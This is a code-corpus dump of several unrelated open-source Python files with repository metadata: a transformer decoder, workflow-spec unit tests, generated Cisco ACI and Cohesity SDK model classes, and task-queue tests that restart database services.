def forward(self, inputs: Tensor, input_lengths: Optional[Any] = None, memory: Tensor = None):
batch_size, output_length = inputs.size(0), inputs.size(1)
self_attn_mask = get_decoder_self_attn_mask(inputs, inputs, self.pad_id)
memory_mask = get_attn_pad_mask(memory, input_lengths, output_length)
output = self.input_dropout(self.embedding(inputs) + self.positional_encoding(inputs.size(1)))
for layer in self.layers:
output, self_attn, memory_attn = layer(output, memory, self_attn_mask, memory_mask)
return output
| [
"sh951011@gmail.com"
] | sh951011@gmail.com |
5eb503c79c974710bfb8cd6bb81664d03409cc35 | a0cbae33d175fdf0299eddc775a1b4b84c0addcf | /orquesta/tests/unit/utils/test_specs.py | 1fe005ff1a6149426c489f2b0933ba00ce4dc4d8 | [
"Apache-2.0"
] | permissive | batk0/orquesta | 240ff95c76c610c52518ee7d2e3eee11b6594a73 | f03f3f2f3820bf111a9277f4f6c5d6c83a89d004 | refs/heads/master | 2020-04-17T10:48:48.016607 | 2019-01-19T15:40:05 | 2019-01-19T15:40:05 | 166,514,957 | 0 | 0 | Apache-2.0 | 2019-01-19T06:37:39 | 2019-01-19T06:37:39 | null | UTF-8 | Python | false | false | 3,302 | py | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import yaml
from orquesta.specs import loader
from orquesta.tests.unit import base
from orquesta.utils import specs
class SpecsUtilTest(base.WorkflowSpecTest):
def setUp(self):
super(SpecsUtilTest, self).setUp()
self.spec_module = loader.get_spec_module(self.spec_module_name)
def test_convert_wf_def_dict_to_spec(self):
wf_name = 'basic'
wf_def = self.get_wf_def(wf_name)
self.assertIsInstance(wf_def, dict)
wf_spec = specs.instantiate(self.spec_module_name, wf_def)
self.assertIsInstance(wf_spec, self.spec_module.WorkflowSpec)
self.assertEqual(wf_name, wf_spec.name)
self.assertDictEqual(wf_def[wf_name], wf_spec.spec)
def test_convert_wf_def_yaml_to_spec(self):
wf_name = 'basic'
wf_def = self.get_wf_def(wf_name, raw=True)
self.assertIsInstance(wf_def, str)
wf_spec = specs.instantiate(self.spec_module_name, wf_def)
self.assertIsInstance(wf_spec, self.spec_module.WorkflowSpec)
self.assertEqual(wf_name, wf_spec.name)
self.assertDictEqual(yaml.safe_load(wf_def)[wf_name], wf_spec.spec)
def test_bad_wf_def_none(self):
self.assertRaises(
ValueError,
specs.instantiate,
self.spec_module_name,
None
)
def test_bad_wf_def_empty(self):
self.assertRaises(
ValueError,
specs.instantiate,
self.spec_module_name,
dict()
)
def test_bad_wf_def_not_yaml(self):
self.assertRaises(
ValueError,
specs.instantiate,
self.spec_module_name,
'foobar'
)
def test_bad_wf_def_without_version(self):
wf_name = 'basic'
wf_def = self.get_wf_def(wf_name)
wf_def.pop('version')
self.assertIsNone(wf_def.get('version'))
self.assertRaises(
ValueError,
specs.instantiate,
self.spec_module_name,
wf_def
)
def test_bad_wf_def_unsupported_version(self):
wf_name = 'basic'
wf_def = self.get_wf_def(wf_name)
wf_def['version'] = 99.0
self.assertRaises(
ValueError,
specs.instantiate,
self.spec_module_name,
wf_def
)
def test_deserialize(self):
wf_name = 'basic'
wf_def = self.get_wf_def(wf_name)
wf_spec_1 = specs.instantiate(self.spec_module_name, wf_def)
wf_spec_2 = specs.deserialize(wf_spec_1.serialize())
self.assertIsInstance(wf_spec_2, self.spec_module.WorkflowSpec)
self.assertEqual(wf_name, wf_spec_2.name)
self.assertDictEqual(wf_def[wf_name], wf_spec_2.spec)
| [
"m4d.coder@gmail.com"
] | m4d.coder@gmail.com |
9e68300285589f45cadd6f6720d062cfc9398b77 | cd78bbe886469a745043a68524519379c5cbd850 | /main.py | b6abc887e73965bfc3a6a82706e47714dee11178 | [] | no_license | datacratic/mldb-dataset-loader | 0e875cc9e76f64c8e031ac0c8a813c2a062446b3 | 9849ac985b21391b23c0bc5b5341e4d7d6fc87d4 | refs/heads/master | 2021-01-21T11:10:59.718147 | 2015-09-21T23:44:01 | 2015-09-21T23:44:01 | 34,128,558 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 99 | py | mldb.plugin.serve_static_folder('/static', 'static')
mldb.plugin.serve_documentation_folder('doc')
| [
"nicolas@datacratic.com"
] | nicolas@datacratic.com |
946fec7bf11af536f56d0e05551393f774b9cab7 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_interiors.py | c9fcc546f81fabbad76438e54f363fd59fe36da0 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#class header
class _INTERIORS():
def __init__(self,):
self.name = "INTERIORS"
		self.definitions = "interior"
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['interior']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
6950a4db338145fef4271f8842be1904ca01b521 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/2cb4a725b4cb9be160d194f7b47df6c98709ebfd-<modify_connection_vlan>-fix.py | e8d4005e4624800007efef4e9d9f7ed6b2b88e01 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | def modify_connection_vlan(self):
cmd = [self.nmcli_bin]
return cmd | [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
90a333ab994fd0e2da8356e54f5d5a862032015c | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/l2/egrbytesag1w.py | 92f1aca335188b4a43df89b2e7f1eee85cdb2d9f | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 19,668 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class EgrBytesAg1w(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.l2.EgrBytesAg1w", "egress bytes")
counter = CounterMeta("multicast", CounterCategory.COUNTER, "bytes", "egress multicast bytes")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "multicastCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "multicastPer"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "multicastSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "multicastThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "multicastTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "multicastTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "multicastRate"
meta._counters.append(counter)
counter = CounterMeta("unicast", CounterCategory.COUNTER, "bytes", "egress unicast bytes")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "unicastCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "unicastPer"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "unicastSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "unicastThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "unicastTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "unicastTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "unicastRate"
meta._counters.append(counter)
meta.moClassName = "l2EgrBytesAg1w"
meta.rnFormat = "CDl2EgrBytesAg1w"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current aggregated egress bytes stats in 1 week"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.fv.Ap")
meta.parentClasses.add("cobra.model.vns.EPpInfo")
meta.parentClasses.add("cobra.model.fv.InBEpP")
meta.parentClasses.add("cobra.model.vns.SDEPpInfo")
meta.parentClasses.add("cobra.model.fv.TnlEPg")
meta.parentClasses.add("cobra.model.fv.RtdEpP")
meta.parentClasses.add("cobra.model.dhcp.PRelPg")
meta.parentClasses.add("cobra.model.fv.TnlEpP")
meta.parentClasses.add("cobra.model.fv.BrEpP")
meta.parentClasses.add("cobra.model.fv.AEPg")
meta.parentClasses.add("cobra.model.l2ext.InstP")
meta.parentClasses.add("cobra.model.vns.SHEPpInfo")
meta.parentClasses.add("cobra.model.l3ext.InstP")
meta.parentClasses.add("cobra.model.infra.PEPg")
meta.parentClasses.add("cobra.model.fv.InstPEpP")
meta.parentClasses.add("cobra.model.fv.OoBEpP")
meta.parentClasses.add("cobra.model.infra.CEPg")
meta.parentClasses.add("cobra.model.vns.REPpInfo")
meta.parentClasses.add("cobra.model.fv.SvcBD")
meta.parentClasses.add("cobra.model.mgmt.InB")
meta.parentClasses.add("cobra.model.fv.Tenant")
meta.parentClasses.add("cobra.model.fv.SvcEpP")
meta.parentClasses.add("cobra.model.fv.EpP")
meta.parentClasses.add("cobra.model.fv.BD")
meta.parentClasses.add("cobra.model.fv.Ctx")
meta.parentClasses.add("cobra.model.dhcp.CRelPg")
meta.parentClasses.add("cobra.model.l3ext.InstPDef")
meta.superClasses.add("cobra.model.l2.EgrBytesAg")
meta.superClasses.add("cobra.model.stats.Curr")
meta.superClasses.add("cobra.model.stats.Item")
meta.rnPrefixes = [
('CDl2EgrBytesAg1w', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "multicastCum", "multicastCum", 21711, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "egress multicast bytes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastCum", prop)
prop = PropMeta("str", "multicastPer", "multicastPer", 21712, PropCategory.IMPLICIT_PERIODIC)
prop.label = "egress multicast bytes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastPer", prop)
prop = PropMeta("str", "multicastRate", "multicastRate", 21717, PropCategory.IMPLICIT_RATE)
prop.label = "egress multicast bytes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastRate", prop)
prop = PropMeta("str", "multicastSpct", "multicastSpct", 21713, PropCategory.IMPLICIT_SUSPECT)
prop.label = "egress multicast bytes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastSpct", prop)
prop = PropMeta("str", "multicastThr", "multicastThr", 21714, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "egress multicast bytes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("multicastThr", prop)
prop = PropMeta("str", "multicastTr", "multicastTr", 21716, PropCategory.IMPLICIT_TREND)
prop.label = "egress multicast bytes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastTr", prop)
prop = PropMeta("str", "multicastTrBase", "multicastTrBase", 21715, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "egress multicast bytes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("multicastTrBase", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "unicastCum", "unicastCum", 21766, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "egress unicast bytes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastCum", prop)
prop = PropMeta("str", "unicastPer", "unicastPer", 21767, PropCategory.IMPLICIT_PERIODIC)
prop.label = "egress unicast bytes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastPer", prop)
prop = PropMeta("str", "unicastRate", "unicastRate", 21772, PropCategory.IMPLICIT_RATE)
prop.label = "egress unicast bytes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastRate", prop)
prop = PropMeta("str", "unicastSpct", "unicastSpct", 21768, PropCategory.IMPLICIT_SUSPECT)
prop.label = "egress unicast bytes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastSpct", prop)
prop = PropMeta("str", "unicastThr", "unicastThr", 21769, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "egress unicast bytes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("unicastThr", prop)
prop = PropMeta("str", "unicastTr", "unicastTr", 21771, PropCategory.IMPLICIT_TREND)
prop.label = "egress unicast bytes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastTr", prop)
prop = PropMeta("str", "unicastTrBase", "unicastTrBase", 21770, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "egress unicast bytes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("unicastTrBase", prop)
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("ATgToGraphInst", "Graph Instances", "cobra.model.vns.GraphInst"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("AEPgToVirtualMachines", "Virtual Machines", "cobra.model.comp.Vm"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("ApToNwIf", "Application Profile to Interface", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("InBToNode", "Node", "cobra.model.fv.Locale"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("EPgToNwIf", "Interface", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("CtxToNwIf", "Private Network to Interface", "cobra.model.nw.If"))
meta.deploymentQueryPaths.append(DeploymentPathMeta("BDToNwIf", "Bridge Domain to Interface", "cobra.model.nw.If"))
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
4332107881083ad19cbe16942b26916ed9a854ca | e837db39c9609830ab8e77dac2077ea30cadc5b3 | /flachdaecher_app/admin.py | 6e3bb183ee3a1257841989b66c3583d79a1ad334 | [] | no_license | windundschnee/accountneu | 9c8ff1507f725a5179604be2640d76b5302a0299 | da9066840a312a95bc628556c94738010787a01f | refs/heads/master | 2022-12-10T06:00:42.449898 | 2019-10-25T18:29:23 | 2019-10-25T18:29:23 | 211,513,631 | 0 | 0 | null | 2022-12-08T05:22:15 | 2019-09-28T14:34:00 | Python | UTF-8 | Python | false | false | 133 | py | from django.contrib import admin
from .models import FlachdachModel
# Register your models here.
admin.site.register(FlachdachModel)
| [
"du@example.com"
] | du@example.com |
789d8aa33c6611b381c958efe2909d5a1a4e8aa4 | 75dcb56e318688499bdab789262839e7f58bd4f6 | /_algorithms_challenges/edabit/_Edabit-Solutions-master/Find the Smallest and Biggest Numbers/solution.py | b9e343dc2a0a5a983bdba5cf2f792491328f77c8 | [] | no_license | syurskyi/Algorithms_and_Data_Structure | 9a1f358577e51e89c862d0f93f373b7f20ddd261 | 929dde1723fb2f54870c8a9badc80fc23e8400d3 | refs/heads/master | 2023-02-22T17:55:55.453535 | 2022-12-23T03:15:00 | 2022-12-23T03:15:00 | 226,243,987 | 4 | 1 | null | 2023-02-07T21:01:45 | 2019-12-06T04:14:10 | Jupyter Notebook | UTF-8 | Python | false | false | 315 | py | def min_max(nums):
nums.sort()
return [nums[0],nums[-1]]
def test():
print("test has started")
a_list = [14, 35, 6, 1, 34, 54]
if min_max(a_list) != [1,54]:
print("error1")
b_list = [1.346, 1.6532, 1.8734, 1.8723]
if min_max(b_list) != [1.346, 1.8734]:
print("error2")
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
5c1a337df0beee9fac92eb02290fbd2e49914b66 | 013432251ee6dc31f505ff0a9e0432ef7b552064 | /int3/errors.py | 334a3ab88c1e7e362b442a0c0476caf7797fb069 | [
"MIT"
] | permissive | Mic92/int3 | 7bb0d16f5488c7cbade576f9f22e6f11c83b6096 | 6057ddd7db9b5ae6c78429da983a0cd5e3686216 | refs/heads/master | 2020-03-26T16:14:04.955426 | 2018-08-22T23:19:29 | 2018-08-22T23:19:29 | 145,089,128 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37 | py | class Int3Error(Exception):
pass
| [
"joerg@thalheim.io"
] | joerg@thalheim.io |
8ff2d9f8ee57060f9e9421080728a6c5e92faa98 | e3abbb5790aac835330b0c2fe59eacc6765ae3cc | /tests/test_disconnects.py | 89b70530832b842d8df631c32c8724c4928950e6 | [
"MIT"
] | permissive | frankrousseau/mrq | 3d9433c809735666208edc532451dbba87f3d40c | 3c9c34f0df1de067c713be6f2d38eff8f923e03b | refs/heads/master | 2021-01-18T05:59:34.727873 | 2015-02-04T14:30:03 | 2015-02-04T14:30:03 | 30,272,780 | 0 | 0 | null | 2015-02-04T00:36:14 | 2015-02-04T00:36:13 | null | UTF-8 | Python | false | false | 892 | py | import time
from mrq.job import Job
import pytest
@pytest.mark.parametrize(["p_service"], [["mongodb"], ["redis"]])
def test_disconnects_service_during_task(worker, p_service):
""" Test what happens when mongodb disconnects during a job
"""
worker.start()
if p_service == "mongodb":
service = worker.fixture_mongodb
elif p_service == "redis":
service = worker.fixture_redis
service_pid = service.process.pid
job_id1 = worker.send_task("tests.tasks.general.Add", {
"a": 41, "b": 1, "sleep": 5}, block=False, queue="default")
time.sleep(2)
service.stop()
service.start()
service_pid2 = service.process.pid
# Make sure we did restart
assert service_pid != service_pid2
time.sleep(5)
# Result should be there without issues
assert Job(job_id1).fetch().data["result"] == 42
| [
"sylvain@sylvainzimmer.com"
] | sylvain@sylvainzimmer.com |
a738b72a044dabd2ea0da78eb4fb5e20d79f0280 | 19236d9e966cf5bafbe5479d613a175211e1dd37 | /cohesity_management_sdk/models/hyper_flex_storae_snapshot.py | be7bd6f758fcf271342c9f9ffb251ae480b2b9b7 | [
"MIT"
] | permissive | hemanshu-cohesity/management-sdk-python | 236c44fbd9604809027f8ddd0ae6c36e4e727615 | 07c5adee58810979780679065250d82b4b2cdaab | refs/heads/master | 2020-04-29T23:22:08.909550 | 2019-04-10T02:42:16 | 2019-04-10T02:42:16 | 176,474,523 | 0 | 0 | NOASSERTION | 2019-03-19T09:27:14 | 2019-03-19T09:27:12 | null | UTF-8 | Python | false | false | 2,226 | py | # -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
class HyperFlexStoraeSnapshot(object):
"""Implementation of the 'HyperFlex Storae Snapshot.' model.
Specifies a Storage Snapshot Provider in a HyperFlex environment.
Attributes:
name (string): Specifies a unique name of the Protection Source
product_version (string): Specifies the product version of the
protection source.
mtype (Type5Enum): Specifies the type of managed Object in a HyperFlex
protection source like kServer. Examples of a HyperFlex types
include 'kServer'. 'kServer' indicates HyperFlex server entity.
uuid (string): Specifies the uuid of the protection source.
"""
# Create a mapping from Model property names to API property names
_names = {
"name":'name',
"product_version":'productVersion',
"mtype":'type',
"uuid":'uuid'
}
def __init__(self,
name=None,
product_version=None,
mtype=None,
uuid=None):
"""Constructor for the HyperFlexStoraeSnapshot class"""
# Initialize members of the class
self.name = name
self.product_version = product_version
self.mtype = mtype
self.uuid = uuid
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
